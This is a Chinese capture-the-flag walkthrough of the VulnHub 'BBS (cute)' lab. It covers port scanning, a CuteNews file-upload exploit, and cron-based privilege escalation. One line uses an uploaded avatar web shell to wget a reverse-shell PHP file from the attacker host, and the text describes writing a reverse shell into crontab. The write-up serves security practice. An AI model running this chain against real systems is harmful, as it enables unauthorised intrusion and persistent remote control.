考点:任意文件上传,定时任务
靶机链接:https://www.vulnhub.com/entry/bbs-cute-102,567/
环境配置
| 名称 | IP |
|---|
| Kali Linux | 10.0.2.15 |
| BBS (CUTE) | 10.0.2.11 |
初步打点
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| $ export rip=10.0.2.11
$ sudo nmap -v -A -p- $rip
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA)
| 256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA)
|_ 256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-favicon: Unknown favicon MD5: 759585A56089DB516D1FBBBE5A8EEA57
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp open http nginx 1.14.2
|_http-title: 404 Not Found
|_http-server-header: nginx/1.14.2
110/tcp open pop3 Courier pop3d
|_pop3-capabilities: LOGIN-DELAY(10) UTF8(USER) TOP STLS IMPLEMENTATION(Courier Mail Server) PIPELINING USER UIDL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-17T16:28:06
| Not valid after: 2021-09-17T16:28:06
| MD5: 5ee2 40c8 66d1 b327 71e6 085a f50b 7e28
|_SHA-1: 28a3 acc0 86a7 cd64 8f09 78fa 1792 7032 0ecc b154
995/tcp open ssl/pop3 Courier pop3d
|_pop3-capabilities: LOGIN-DELAY(10) TOP UTF8(USER) IMPLEMENTATION(Courier Mail Server) PIPELINING USER UIDL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-17T16:28:06
| Not valid after: 2021-09-17T16:28:06
| MD5: 5ee2 40c8 66d1 b327 71e6 085a f50b 7e28
|_SHA-1: 28a3 acc0 86a7 cd64 8f09 78fa 1792 7032 0ecc b154
|
WEB测试
端口88
未发现有用信息
端口80
dirb和dirsearch都发现了index.php
漏洞发现
查看利用脚本,发现CuteNews目录需要手工去除
使用新建的用户ZOu0fykHPn登录
获得权限
靶机测试
头像处是上传的shell
访问http://10.0.2.11/uploads/avatar_ZOu0fykHPn_ZOu0fykHPn.php文件存在
下载r444.php
1
| http://10.0.2.11/uploads/avatar_ZOu0fykHPn_ZOu0fykHPn.php?cmd=wget http://10.0.2.15/reverse/r444.php
|
访问http://10.0.2.11/uploads/r444.php
反弹shell成功
提权
将反弹shell写入crontab
最后修改于 2020-09-24